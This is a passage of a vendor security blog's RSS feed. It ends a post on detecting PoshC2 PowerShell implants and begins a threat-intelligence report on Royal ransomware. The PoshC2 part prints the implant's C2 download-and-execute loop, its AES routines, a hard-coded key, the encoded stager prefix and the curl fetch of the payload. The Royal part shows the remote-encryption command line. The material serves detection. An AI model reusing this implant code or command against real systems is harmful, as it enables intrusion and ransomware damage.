href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.56.48-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83409" src= ]]>
<![CDATA[
"https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.56.48-PM-1024x66.png"
alt="" width="800" height="52"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.56.48-PM-1024x66.png
1024w, https://blogs.vmware.com/security/files/2023/03/Screen-S ]]>
<![CDATA[ hot-2023-03-24-at-12.56.48-PM-300x19.png 300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.56.48-PM-768x49.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.56.48-PM-1536x99.png
1536w, https://blogs.vmware.com/security/files/2023/ ]]>
<![CDATA[ 03/Screen-Shot-2023-03-24-at-12.56.48-PM-2048x132.png 2048w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.56.48-PM-600x39.png
600w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><i><span
data-contrast="none">Figure </span></i><i><span data-contrast="none">4</s ]]>
<![CDATA[ pan></i><i><span data-contrast="none">: Two different builds of the
PowerShell one-liner (decoded Base64 command).</span></i><span
data-ccp-props="{"201341983":0,"335551550":2,"335551620":2,"335559739":200,"335559740":240}"> </span></p>
<p><span dat ]]>
<![CDATA[ a-contrast="auto">PoshC2 replies with the Base64-encoded payload.txt
to every download attempt coming from the one-liner</span><i><span
data-contrast="auto">:</span></i><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><strong><i>jo ]]>
<![CDATA[ hn@ubuntu:~$ curl -k
https://127.0.0.1/Philips/v902/_rp</i></strong></p>
<p><strong><i>W1N5c3RlbS5OZXQuU2VydmljZVBvaW50TWFuYWdlcl06OlNlcnZlckNlcnRpZmljYXRlVmFsaWRhd</i></strong></p>
<p><strong><i>GlvbkNhbGxiYWNrID0geyR0cnVlfQokZGY9QCgiIikKJGg9IiIKJHNjPSIiCiR1cmxzPUAoImh0dHBzOi8v</i></strong></p>
<p> ]]>
<![CDATA[ <strong><i><…></i></strong></p>
<p><strong><i>1pdCAtMTsKICAgICAgICBwcmltZXJzCiAgICAgICAgU3RhcnQtU2xlZXAgJHdhaXQKICAgICAgICAk</i></strong></p>
<p><strong><i>d2FpdCA9ICR3YWl0ICogMjsKICAgIH0KfQplbHNlCnsKICAgIHByaW1lcnMKfQo=</i></strong></p>
<h2 aria-level="1"><span data-contrast="none">The ]]>
<![CDATA[ PowerShell Implant</span></h2> <p><span data-contrast="auto">Full
analysis of the main implant (e5f2b83f05f6210410f52d59ef50357a55dc2af5) reveals
the following details (as a reminder, PoshC2 stores the non-obfuscated
PowerShell implant inside payload.txt). First off, the code disables certificate
ve ]]>
<![CDATA[ rification (as the attackers often use self-signed SSL certificates,
another common indicator of compromise). It also contains a list of C2 URLs and
a URI:</span></p>
<p><strong><i>[System.Net.ServicePointManager]::ServerCertificateValidationCallback
= {$true}</i></strong></p> <p><strong><i>$df=@(&# ]]>
<![CDATA[ 8220;”)</i></strong></p>
<p><strong><i>$h=””</i></strong></p>
<p><strong><i>$sc=””</i></strong></p>
<p><strong><i>$urls=@(“https://127.0.0.1”)</i></strong></p>
<p><strong><i>$curl=”/cisben/marketq/”</i></strong></p>
<p><strong><i>$s=$urls[0]</i>< ]]>
<![CDATA[ /strong></p> <p><span data-contrast="auto">The URI, stored in
</span><i><span data-contrast="auto">$curl</span></i><span
data-contrast="auto">, is randomly taken from the file PoshC2/resources/urls.txt
(shown in </span><span data-contrast="auto">Figure 5</span><span
data-contrast="auto">). The prese ]]>
<![CDATA[ nce of one of these strings in the URL is another indicator of
compromise that can be used by a detection rule.</span></p> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.59.48-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83410" src= ]]>
<![CDATA[
"https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.59.48-PM-888x1024.png"
alt="" width="800" height="922"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.59.48-PM-888x1024.png
888w, https://blogs.vmware.com/security/files/2023/03/Screen ]]>
<![CDATA[ -Shot-2023-03-24-at-12.59.48-PM-260x300.png 260w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.59.48-PM-768x886.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.59.48-PM-600x692.png
600w, https://blogs.vmware.com/security/files/20 ]]>
<![CDATA[ 23/03/Screen-Shot-2023-03-24-at-12.59.48-PM.png 1006w"
sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><i><span
data-contrast="none">Figure </span></i><i><span
data-contrast="none">5</span></i><i><span data-contrast="none">: Set of rotated
URIs.</span></i><span data-ccp-props="{"201341983 ]]>
<![CDATA[
":0,"335551550":2,"335551620":2,"335559739":200,"335559740":240}"> </span></p>
<p><span data-contrast="auto">Interaction between the implant and the server is
encrypted with AES, and the resulting byte stream is further encoded in Base64.
The implant has ]]>
<![CDATA[ three functions to perform encryption – </span><i><span
data-contrast="auto">CAM</span></i><span data-contrast="auto"> (initializes the
crypto provider), </span><i><span data-contrast="auto">ENC</span></i><span
data-contrast="auto"> (encrypts data), and </span><i><span
data-contrast="auto">DEC</s ]]>
<![CDATA[ pan></i><span data-contrast="auto"> (decrypts data):</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><strong><i>function CAM ($key,$IV){</i></strong></p> <p><strong><i>try {$a =
New-Object “System.Security.Cryptography ]]>
<![CDATA[ .RijndaelManaged”</i></strong></p> <p><strong><i>} catch {$a =
New-Object
“System.Security.Cryptography.AesCryptoServiceProvider”}</i></strong></p>
<p><strong><i>$a.Mode =
[System.Security.Cryptography.CipherMode]::CBC</i></strong></p>
<p><strong><i>$a.Padding = [System.Security.Cr ]]>
<![CDATA[ yptography.PaddingMode]::Zeros</i></strong></p>
<p><strong><i>$a.BlockSize = 128</i></strong></p> <p><strong><i>$a.KeySize =
256</i></strong></p> <p><strong><i>if ($IV)</i></strong></p>
<p><strong><i>{</i></strong></p> <p><strong><i>if ($IV.getType().Name -eq
“String”)</i></strong></p> < ]]>
<![CDATA[ p><strong><i>{$a.IV =
[System.Convert]::FromBase64String($IV)}</i></strong></p>
<p><strong><i>else</i></strong></p> <p><strong><i>{$a.IV = $IV}</i></strong></p>
<p><strong><i>}</i></strong></p> <p><strong><i>if ($key)</i></strong></p>
<p><strong><i>{</i></strong></p> <p><strong><i>if ($key.getType() ]]>
<![CDATA[ .Name -eq “String”)</i></strong></p> <p><strong><i>{$a.Key
= [System.Convert]::FromBase64String($key)}</i></strong></p>
<p><strong><i>else</i></strong></p> <p><strong><i>{$a.Key =
$key}</i></strong></p> <p><strong><i>}</i></strong></p>
<p><strong><i>$a}</i></strong></p> <p><strong><i>fun ]]>
<![CDATA[ ction ENC ($key,$un){</i></strong></p> <p><strong><i>$b =
[System.Text.Encoding]::UTF8.GetBytes($un)</i></strong></p> <p><strong><i>$a =
CAM $key</i></strong></p> <p><strong><i>$e =
$a.CreateEncryptor()</i></strong></p> <p><strong><i>$f =
$e.TransformFinalBlock($b, 0, $b.Length)</i></strong></p> <p> ]]>
<![CDATA[ <strong><i>[byte[]] $p = $a.IV + $f</i></strong></p>
<p><strong><i>[System.Convert]::ToBase64String($p)</i></strong></p>
<p><strong><i>}</i></strong></p> <p><strong><i>function DEC
($key,$enc){</i></strong></p> <p><strong><i>$b =
[System.Convert]::FromBase64String($enc)</i></strong></p> <p><strong>< ]]>
<![CDATA[ i>$IV = $b[0..15]</i></strong></p> <p><strong><i>$a = CAM $key
$IV</i></strong></p> <p><strong><i>$d = $a.CreateDecryptor()</i></strong></p>
<p><strong><i>$u = $d.TransformFinalBlock($b, 16, $b.Length –
16)</i></strong></p>
<p><strong><i>[System.Text.Encoding]::UTF8.GetString([System.Convert]: ]]>
<![CDATA[
:FromBase64String([System.Text.Encoding]::UTF8.GetString($u).Trim([char]0)))}</i></strong></p>
<p><span data-contrast="auto">After sending a request to the C2 server,
</span><i><span data-contrast="auto">primern</span></i><span
data-contrast="auto"> verifies the response by looking for the presence ]]>
<![CDATA[ of the “*key*” string. If the string is present, then the code
executes the received PowerShell code with the help of </span><i><span
data-contrast="auto">iex </span></i><span data-contrast="auto">(an alias for the
</span><i><span data-contrast="auto">Invoke-Expression</span></i><span
data-contr ]]>
<![CDATA[ ast="auto"> cmdlet):</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><strong><i>$primern = (Get-Webclient -Cookie
$pp).downloadstring($script:s)</i> </strong></p> <p><strong><i>$p = dec -key
KgVKnyH0ZlTk8KlGhp6XpWOY7i6IS+K4 ]]>
<![CDATA[ 7yuVBY0/xR4= -enc $primern</i></strong></p> <p><strong><i>if ($p -like
“*key*”) {$p| iex}</i> </strong></p> <p><span
data-contrast="auto">The combination of specific functions and strings, which
have been used in the code (e.g., ServerCertificateValidationCallback,
AesCryptoServiceProvi ]]>
<![CDATA[ der, FromBase64String, ToBase64String, System.Net.WebProxy, *key*,
System.Net.WebClient) creates a unique fingerprint that can be used to detect
the implant.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contras ]]>
<![CDATA[ t="auto">Every build of a PowerShell implant updates three parameters:
URI, encryption key, and decryption key (see </span><span
data-contrast="auto">Figure 6</span><span data-contrast="auto">).</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}
]]>
<![CDATA[ "> </span></p> <p><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.03.01-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83411" src="https: ]]>
<![CDATA[
//blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.03.01-PM-1024x463.png"
alt="" width="800" height="362"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.03.01-PM-1024x463.png
1024w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-20 ]]>
<![CDATA[ 23-03-24-at-1.03.01-PM-300x136.png 300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.03.01-PM-768x347.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.03.01-PM-1536x695.png
1536w, https://blogs.vmware.com/security/files/2023/03/Scr ]]>
<![CDATA[ een-Shot-2023-03-24-at-1.03.01-PM-600x271.png 600w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.03.01-PM.png
1910w" sizes="(max-width: 800px) 100vw, 800px" /></a></span></p> <p><i><span
data-contrast="none">Figure </span></i><i><span
data-contrast="none">6</span></i>< ]]>
<![CDATA[ i><span data-contrast="none">: URI and network keys change after each
build.</span></i></p> <p><span data-contrast="auto">While the encryption keys
are generated on the fly, the URI, as mentioned earlier, is randomly taken from
the file PoshC2/resources/urls.txt (see </span><span data-contrast="auto ]]>
<![CDATA[ ">Figure 5</span><span data-contrast="auto">). These few changes in
the source code cause a drastic effect on the Base64-encoded PowerShell command,
as the output of the KDiff3</span> <span data-contrast="auto">tool highlights in
</span><span data-contrast="auto">Figure 7</span><span data-contrast=" ]]>
<![CDATA[ auto">.</span></p> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.04.09-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83412"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.04.09-PM-1024x464.png"
alt=" ]]>
<![CDATA[ " width="800" height="362"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.04.09-PM-1024x464.png
1024w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.04.09-PM-300x136.png
300w, https://blogs.vmware.com/security/files/2023/03/Screen-Sh ]]>
<![CDATA[ ot-2023-03-24-at-1.04.09-PM-768x348.png 768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.04.09-PM-1536x696.png
1536w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.04.09-PM-600x272.png
600w, https://blogs.vmware.com/security/files/2023/0 ]]>
<![CDATA[ 3/Screen-Shot-2023-03-24-at-1.04.09-PM.png 1886w" sizes="(max-width:
800px) 100vw, 800px" /></a></p> <p><em><span class="TextRun SCXW189884544 BCX2"
lang="EN-US" xml:lang="EN-US" data-contrast="none"><span class="NormalTextRun
SCXW189884544 BCX2" data-ccp-parastyle="caption">Figure </span></span><sp ]]>
<![CDATA[ an class="FieldRange SCXW189884544 BCX2"><span class="TextRun
SCXW189884544 BCX2" lang="EN-US" xml:lang="EN-US" data-contrast="none"><span
class="NormalTextRun SCXW189884544 BCX2"
data-ccp-parastyle="caption">7</span></span></span><span class="TextRun
SCXW189884544 BCX2" lang="EN-US" xml:lang="EN-US ]]>
<![CDATA[ " data-contrast="none"><span class="NormalTextRun SCXW189884544 BCX2"
data-ccp-parastyle="caption">: Two different</span><span class="NormalTextRun
SCXW189884544 BCX2" data-ccp-parastyle="caption"> builds of</span><span
class="NormalTextRun SCXW189884544 BCX2" data-ccp-parastyle="caption"> payload.b
]]>
<![CDATA[ at file</span><span class="NormalTextRun SCXW189884544 BCX2"
data-ccp-parastyle="caption"> with the </span><span class="NormalTextRun
SCXW189884544 BCX2" data-ccp-parastyle="caption">same configuration</span><span
class="NormalTextRun SCXW189884544 BCX2" data-ccp-parastyle="caption">, but
different ]]>
<![CDATA[ </span><span class="NormalTextRun SCXW189884544 BCX2"
data-ccp-parastyle="caption">crypto keys</span><span class="NormalTextRun
SCXW189884544 BCX2" data-ccp-parastyle="caption"> and URI</span><span
class="NormalTextRun SCXW189884544 BCX2"
data-ccp-parastyle="caption">.</span></span></em></p> <p><spa ]]>
<![CDATA[ n data-contrast="auto">The beginning of the Base64-encoded code in
payload.bat, however, is bound to remain the same, making it a suitable
candidate for a detection signature. When decoded, that fragment corresponds to
the following PowerShell code:</span><span
data-ccp-props="{"201341983" ]]>
<![CDATA[ :0,"335559739":160,"335559740":259}"> </span></p>
<p><strong><i>IEX(New-Object
IO.StreamReader((New-ObjectSystem.IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String(‘</i></strong></p>
<h2 aria-level="1"><span data-contrast="none">Conclusions</span><span ]]>
<![CDATA[
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559738":240,"335559739":0,"335559740":259}"> </span></h2>
<p><span data-contrast="auto">In this blog post, we showed how to use PoshC2 to
generate PowerShell implants and ]]>
<![CDATA[ stagers. We also explained how proxy tools (such as mshta.exe or
regsvr32.exe) are often used to further increase the complexity of the delivery
process, making detection a challenging task. The last section analyzed the
PowerShell implant and detailed the underlying logic.</span><span data-ccp-pro
]]>
<![CDATA[
ps="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">Throughout the whole article, we identified the
following IoCs to detect PoshC2 PowerShell implants:</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<ol> <li><span data-contrast="auto">Usage of System Binary Proxy Execution
technique (MITRE ID </span><a
href="https://attack.mitre.org/techniques/T1218/"><span
data-contrast="none">T1218</span></a><span data-contrast="auto">).</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li><span data-contrast="auto">Presence of PoshC2 specific keywords (URIs from
urls.txt; code snippets; Base64 strings).</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li><span data-contrast="auto">Execution of powershell.exe with long
Base64-encoded commands.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li><span data-contrast="auto">Usage of self-signed SSL certificates in network
communications.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
</ol> <p><span data-contrast="auto">To help security researchers, we created
YARA rules for the PowerShell stager and the PowerShell implant. They are all
available <a href="https://github.com/vmware-samples/tau-research">in our
repository</a>.</span></p><p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/03/how-to-detect-poshc2-powershell-implants.html">How
to Detect PoshC2 PowerShell Implants</a> appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</content:encoded>
...
</item>
<item>
<title>Unveiling the Evolution of Royal Ransomware</title>
<link>https://blogs.vmware.com/security/2023/03/unveiling-the-evolution-of-royal-ransomware.html?utm_source=rss&utm_medium=rss&utm_campaign=unveiling-the-evolution-of-royal-ransomware</link>
<dc:creator>
<![CDATA[ Deborah Snyder, Tatiana Vollbrecht, Kyle Shafto and Dana Behling ]]>
...
</dc:creator>
<pubDate>Thu, 16 Mar 2023 20:11:57 +0000</pubDate>
<category>
<![CDATA[ Threat Intelligence ]]>
...
</category>
<guid isPermaLink="false">https://blogs.vmware.com/security/?p=83390</guid>
<description>
<![CDATA[ <div><img width="300" height="162"
src="https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-300x162.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-300x162.png
300w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-1024x555.png
1024w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-768x416.png
768w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-1536x832.png
1536w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-410x222.png
410w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-600x325.png
600w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-415x225.png
415w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-585x318.png
585w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-380x207.png
380w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-222x120.png
222w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured.png
1710w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>While the evolution
of ransomware techniques is to be expected, the speed at which the Royal
Ransomware Group has been able to adapt is impressive. Since it was first
reported, those responsible for Royal ransomware have advanced quickly over a
short period of time, leveraging old and new techniques as well as exploiting
novel vulnerabilities … <a
href="https://blogs.vmware.com/security/2023/03/unveiling-the-evolution-of-royal-ransomware.html">Continued</a></p>
<p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/03/unveiling-the-evolution-of-royal-ransomware.html">Unveiling
the Evolution of Royal Ransomware</a> appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</description>
<content:encoded>
<![CDATA[ <div><img width="300" height="162"
src="https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-300x162.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-300x162.png
300w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-1024x555.png
1024w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-768x416.png
768w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-1536x832.png
1536w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-410x222.png
410w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-600x325.png
600w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-415x225.png
415w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-585x318.png
585w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-380x207.png
380w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-222x120.png
222w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured.png
1710w" sizes="(max-width: 300px) 100vw, 300px" /></div><p>While the evolution of
ransomware techniques is to be expected, the speed at which the Royal Ransomware
Group has been able to adapt is impressive. Since it was first reported, those
responsible for Royal ransomware have advanced quickly over a short period of
time, leveraging old and new techniques as well as exploiting novel
vulnerabilities as they are discovered. In just the last six months, they have
rapidly escalated attacks targeting victims across numerous industries and
countries.</p> <p>The Royal Ransomware Group has also leveraged evasion
techniques such as Virtual Instances <a
href="https://attack.mitre.org/techniques/T1564/006/">[1]</a>, which made it
challenging for defenders to prevent encryption once the threat actor had gained
access to the targeted victim environment. Interestingly, some of the attributes
were reminiscent of an older 2020 sample of Conti ransomware. External research
by Vitali Kremez from AdvIntel has stated a direct relationship between Conti
and Royal ransomware [<a
href="https://twitter.com/VK_Intel/status/1557003350541242369">2</a>]. Comparing
a recent Royal sample against Conti’s and other Royal ransomware variants over
the past six months could provide insight into the threat actors’ future
activity.</p> <h2><strong>Who is Royal Ransomware?</strong></h2> <p>Initially
identified as Zeon in January of 2022, Royal ransomware has been rebranded as
“Royal” since September of 2022 <a
href="https://www.bleepingcomputer.com/news/security/ransomware-gangs-move-to-callback-social-engineering-attacks/">[3]</a>.
Since then, they have targeted companies across numerous industries such as
Manufacturing, Healthcare, Food, and Education. Although over 60% of targeted
companies have been in the United States, the Royal Ransomware Group has not
shied away from targeting countries around the world including Europe and Latin
America.</p> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83398"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM-1024x416.png"
alt="" width="800" height="325"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM-1024x416.png
1024w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM-300x122.png
300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM-768x312.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM-1536x624.png
1536w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM-600x244.png
600w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM.png
1606w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><strong><em>Figure
1: </em></strong><em>Graph of Industries Targeted by the Royal Ransomware Group
collected via their Leak Site from September 2022 – February
2023.</em></p> <p>Over the past six months, the Royal Ransomware Group has
targeted both small and large companies. In December of 2022, there appeared to
be a clear pivot to targeting larger companies and a steady decline in targeting
smaller organizations. There has also been an overall decline in the number of
reported attacks in the first quarter of 2023.</p> <p><em><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83397"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM-1024x634.png"
alt="" width="800" height="495"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM-1024x634.png
1024w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM-300x186.png
300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM-768x475.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM-1536x950.png
1536w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM-600x371.png
600w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM.png
1584w" sizes="(max-width: 800px) 100vw, 800px" /></a></em></p>
<p><strong><em>Figure 2:</em></strong><em> Line Chart summarizing the Size of
Targeted Companies collected via their Leak Site from September 2022 –
February 2023. </em></p> <p>With each new variant of Royal ransomware since
September comes different techniques and features, old and new such as:</p> <ul>
<li>Callback phishing (BazarCall) <a
href="https://www.bleepingcomputer.com/news/security/ransomware-gangs-move-to-callback-social-engineering-attacks/">[3]</a></li>
<li>File encryption over SMB</li> <li>Expansive LOLbin utilization</li>
<li>Rapid abuse of new vulnerabilities such as CVE-2022-27510 <a
href="https://www.techrepublic.com/article/royal-ransomware-linux-vmware-esxi/">[4]
</a></li> <li>Leveraging popular malware and tools such as Qbot, Batloader,
Cobalt Strike, etc.</li> </ul> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83396"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM-1024x372.png"
alt="" width="800" height="290"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM-1024x372.png
1024w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM-300x109.png
300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM-768x279.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM-1536x558.png
1536w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM-600x218.png
600w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM.png
1548w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><strong><em>Figure
3:</em></strong><em> Timeline of major changes observed with Royal ransomware
over the last six months as reported by security researchers [</em><a
href="https://www.bleepingcomputer.com/news/security/ransomware-gangs-move-to-callback-social-engineering-attacks/"><em>3</em></a><em>]
[</em><a
href="https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html"><em>8</em></a><em>]</em></p>
<h2>A Royal Delivery</h2> <p>VMware Carbon Black’s Threat Analysis Unit (TAU)
recently investigated a Royal ransomware attack leveraging file encryption over
SMB. The threat actor was able to gain access to a customer’s environment and
remotely encrypt files across five devices. Unlike what has previously been seen
by the Royal Ransomware Group <a
href="https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive">[5]</a>,
the threat actor did not disable the antivirus/EDR and did not delete volume
shadow copies. These actions may have been omitted to avoid alerting any sensors
or to avoid being blocked, but it is important to consider that the sample
itself has the ability to delete volume shadow copies.</p> <p>To begin, Carbon
Black was informed that the threat actor gained access to Server A and spun up a
Virtual Machine (VM). From that VM, they successfully connected back to the host
device via SMB as well as five additional servers.</p> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.59.54-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83395"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.59.54-PM.png"
alt="" width="800" height="421"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.59.54-PM.png
940w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.59.54-PM-300x158.png
300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.59.54-PM-768x404.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.59.54-PM-600x316.png
600w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><strong><em>Figure
4:</em></strong><em> Diagram summarizing the flow of events in the Royal
ransomware attack in the customer environment.</em></p> <p>Shortly after gaining
access to each server, the remote file encryption began. Royal ransomware must
be executed via command line by a threat actor actively within the target
environment. To remotely encrypt a server, the threat actor uses the IP address
and targeted drive in the command line as shown:</p>
<p><strong><em>[RansomwareName].exe -ep 5 -path \\XXX.XXX.XXX.XXX\C$ -id [32
char string]”</em></strong></p> <p>This activity masquerades as routine system
activity. Additionally, with the threat actor using a newly created VM without a
sensor installed, some malicious activity on the device could go undetected.</p>
<h2>Conti Ransomware in Retrospect</h2> <p>The investigated Royal ransomware
attack revealed features previously identified in Conti ransomware [<a
href="https://blogs.vmware.com/security/2020/07/tau-threat-discovery-conti-ransomware.html">6</a>].
Like Royal ransomware, Conti is designed to be executed by an adversary
monitoring the environment. In 2020, it used a similar command line execution to
target local drives, network shares, and even specific IP addresses. Upon deeper
analysis, there are numerous similarities that were seen between this 2020 Conti
sample and our 2023 sample of Royal ransomware.</p> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.58.52-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83394"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.58.52-PM.png"
alt="" width="800" height="638"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.58.52-PM.png
799w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.58.52-PM-300x239.png
300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.58.52-PM-768x612.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.58.52-PM-600x478.png
